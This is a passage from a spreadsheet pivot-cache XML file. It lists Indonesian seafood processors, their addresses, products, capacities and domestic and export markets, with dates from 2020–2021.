    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="22276"/>
    <x v="661"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Segar"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="22277"/>
    <x v="661"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="22278"/>
    <x v="661"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22284"/>
    <x v="662"/>
    <s v="CV. LAUTAN JALAN MULIA"/>
    <s v="Jl. Raya Manado - Bitung, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Singapore"/>
  </r>
  <r>
    <n v="22285"/>
    <x v="662"/>
    <s v="CV. LAUTAN JALAN MULIA"/>
    <s v="Jl. Raya Manado - Bitung, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="500"/>
    <s v="Kota Surabaya"/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="22286"/>
    <x v="607"/>
    <s v="CV, CAHAYA SEJAHTERA"/>
    <s v="Jl, P, Nusa Barung Komp Niaga Malindo No,3A KIM I, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cacing Laut Kering"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Banda Aceh, Kota Medan, Kota Palembang, Kota Batam, Kota Jakarta Utara, Kota Semarang, Kota Surabaya"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22287"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Bernilai tambah Beku"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22288"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Bernilai Tambah Beku"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="7000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22289"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Bernilai Tambah Beku"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22290"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Bernilai Tambah Beku"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22292"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Pasteurisasi Beku"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22293"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Pasteurisasi Dingin"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="4000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22294"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Campuran Seafood Pasteurisasi Dingin"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="4000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22295"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Campuran Seafood Pasteurisasi Beku"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22296"/>
    <x v="663"/>
    <s v="PT. KARIMATA TIMUR"/>
    <s v="Jl. A. Yani No.88 Km 34 RT 002 RW 002, Kel. Nusa Indah, Kec. Bati-Bati, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="624"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22297"/>
    <x v="262"/>
    <s v="PT. PINGROUN FOOD JAKARTA"/>
    <s v="Kawasan Industri Lippo Cikarang Delta Silicon I Jl. Akasia I Kav A8 No.5A, Kel. Sukaresmi, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Fillet Sidat Beku"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="17000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22298"/>
    <x v="663"/>
    <s v="PT. KARIMATA TIMUR"/>
    <s v="Jl. A. Yani No.88 Km 34 RT 002 RW 002, Kel. Nusa Indah, Kec. Bati-Bati, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="22300"/>
    <x v="293"/>
    <s v="PT. KIANTAKA RASA"/>
    <s v="Jl. Raya Serang Km 12,5 Kampung Kadu RT 006 RW 001, Kel. Bunder, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Flakes Rumput Laut"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Pati, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22301"/>
    <x v="293"/>
    <s v="PT. KIANTAKA RASA"/>
    <s v="Jl. Raya Serang Km 12,5 Kampung Kadu RT 006 RW 001, Kel. Bunder, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tepung Jelly, Tepung Puding"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22303"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No.168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Lobster Hidup"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22304"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No.168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Hidup"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22305"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No.168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Belut Hidup"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22306"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kepiting Rebus Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22307"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22308"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Lunak Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22309"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Kakap, Barramundi)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22310"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kembung, Tenggiri)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22311"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22312"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22313"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Kembung, Tenggiri)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22314"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakap, Barramundi)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22315"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22320"/>
    <x v="666"/>
    <s v="PT. KALIMANTAN FISHERY"/>
    <s v="Jl. Tanjung Berkat No. 3, Kel. Teluk Tiram, Kec. Banjarmasin Barat, Kota Banjarmasin&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Udang Beku"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="47000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22321"/>
    <x v="667"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima Raya I Blok D No,2C, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-10-23T00:00:00"/>
    <n v="14580"/>
    <m/>
    <s v="American Samoa, Australia, Japan, Korea, Democratic People's Republic of, R√©union, Russian Federation"/>
  </r>
  <r>
    <n v="22322"/>
    <x v="667"/>
    <s v="PT, WAHYU PRADANA BINAMULIA"/>
    <s v="Jl, Kima Raya I Blok D No,2C, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-10-23T00:00:00"/>
    <n v="1500000"/>
    <m/>
    <s v="American Samoa, Australia, Japan, Russian Federation"/>
  </r>
  <r>
    <n v="22323"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22325"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22326"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Segar"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22327"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Segar"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22329"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22330"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22332"/>
    <x v="668"/>
    <s v="PT. SUKANDA DJAYA"/>
    <s v="Kawasan Industri MM2100 Jalan Irian Blok FF No. 2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="22333"/>
    <x v="668"/>
    <s v="PT. SUKANDA DJAYA"/>
    <s v="Kawasan Industri MM2100 Jalan Irian Blok FF No. 2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Asap Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="22334"/>
    <x v="668"/>
    <s v="PT. SUKANDA DJAYA"/>
    <s v="Kawasan Industri MM2100 Jalan Irian Blok FF No. 2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Halibut)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="22335"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Daging Rajungan Pasteurisasi Dingin"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22336"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="242460"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22337"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Daging Rajungan Pasteurisasi Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22338"/>
    <x v="477"/>
    <s v="PT. BARAMUDA BAHARI"/>
    <s v="Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="191000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22339"/>
    <x v="670"/>
    <s v="PT. KML ICHIMASA FOODS"/>
    <s v="Jl. Lambau (Kawasan Propindo Gemilang) Kp. Babakan Rawa Haur No.02 RT 004 RW 006, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Stik Kepiting Analog Beku"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="561295"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Semarang, Kota Surabaya, Kota Tangerang"/>
    <s v="Canada, China, Hong Kong, Japan, Kuwait, Mexico, Puerto Rico, Saudi Arabia, United States"/>
  </r>
  <r>
    <n v="22340"/>
    <x v="636"/>
    <s v="CV, NOVIRA ABADI"/>
    <s v="Jl, T, Nyak Makam No,04, Kel, Le Masen Kayee Adang, Kec, Syiah Kuala, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Kakatua, Kakap, Barramundi)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya, Kota Makassar"/>
    <s v="China, Japan, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22341"/>
    <x v="636"/>
    <s v="CV, NOVIRA ABADI"/>
    <s v="Jl, T, Nyak Makam No,04, Kel, Le Masen Kayee Adang, Kec, Syiah Kuala, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakatua, Kakap, Barramundi)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="China, Japan, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22344"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kakap, Kerapu)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22345"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Fillet Tuna Segar"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22346"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Lemadang)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22347"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Lemadang)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22348"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22349"/>
    <x v="671"/>
    <s v="PT. INDO MANDIRI SEJAHTERA"/>
    <s v="Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22350"/>
    <x v="671"/>
    <s v="PT. INDO MANDIRI SEJAHTERA"/>
    <s v="Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22351"/>
    <x v="671"/>
    <s v="PT. INDO MANDIRI SEJAHTERA"/>
    <s v="Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22352"/>
    <x v="671"/>
    <s v="PT. INDO MANDIRI SEJAHTERA"/>
    <s v="Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Segar"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
